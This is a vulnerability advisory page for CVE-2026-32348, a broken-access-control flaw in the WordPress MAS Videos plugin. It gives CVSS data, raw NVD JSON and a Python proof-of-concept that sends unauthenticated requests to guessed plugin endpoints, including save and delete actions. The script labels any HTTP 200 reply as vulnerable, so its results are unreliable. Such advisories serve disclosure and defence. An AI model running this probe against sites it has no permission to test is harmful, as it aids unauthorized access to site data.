Security Vulnerability Report
中文
CVE-2026-32348 CVSS 5.3 MEDIUM

CVE-2026-32348

Published: 2026-03-13 19:54:47
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in MadrasThemes MAS Videos masvideos allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MAS Videos: from n/a through <= 1.3.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

MAS Videos <= 1.3.2 (所有版本)
WordPress MAS Videos插件:n/a through <= 1.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32348 PoC - MAS Videos Broken Access Control # Target: WordPress site with MAS Videos plugin <= 1.3.2 import requests import sys def test_unauthorized_access(target_url): """ Test for Missing Authorization vulnerability in MAS Videos plugin This PoC demonstrates unauthorized access to protected endpoints """ # Target WordPress site base_url = target_url.rstrip('/') # Common MAS Videos endpoints that may lack authorization endpoints = [ '/wp-json/masvideos/v1/videos', '/wp-json/masvideos/v1/video', '/wp-admin/admin-ajax.php?action=masvideos_video_save', '/wp-admin/admin-ajax.php?action=masvideos_video_delete', '/wp-json/masvideos/v1/playlists', '/wp-json/masvideos/v1/video_categories' ] print(f"[*] Testing CVE-2026-32348 on {base_url}") print(f"[*] Target plugin: MAS Videos <= 1.3.2") print("-" * 50) for endpoint in endpoints: url = base_url + endpoint try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) # Check if we get unexpected successful response if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes") # Try to identify exposed data if 'application/json' in response.headers.get('Content-Type', ''): try: data = response.json() print(f" Data preview: {str(data)[:200]}...") except: pass elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {endpoint} (Status: {response.status_code})") else: print(f"[?] Unknown: {endpoint} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error testing {endpoint}: {str(e)}") print("-" * 50) print("[*] Test completed") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-32348-poc.py <target_url>") print("Example: python cve-2026-32348-poc.py http://example.com") sys.exit(1) target = sys.argv[1] test_unauthorized_access(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32348", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:46.590", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in MadrasThemes MAS Videos masvideos allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MAS Videos: from n/a through <= 1.3.2."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en MadrasThemes MAS Videos masvideos permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a MAS Videos: desde n/a hasta &lt;= 1.3.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/masvideos/vulnerability/wordpress-mas-videos-plugin-1-3-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}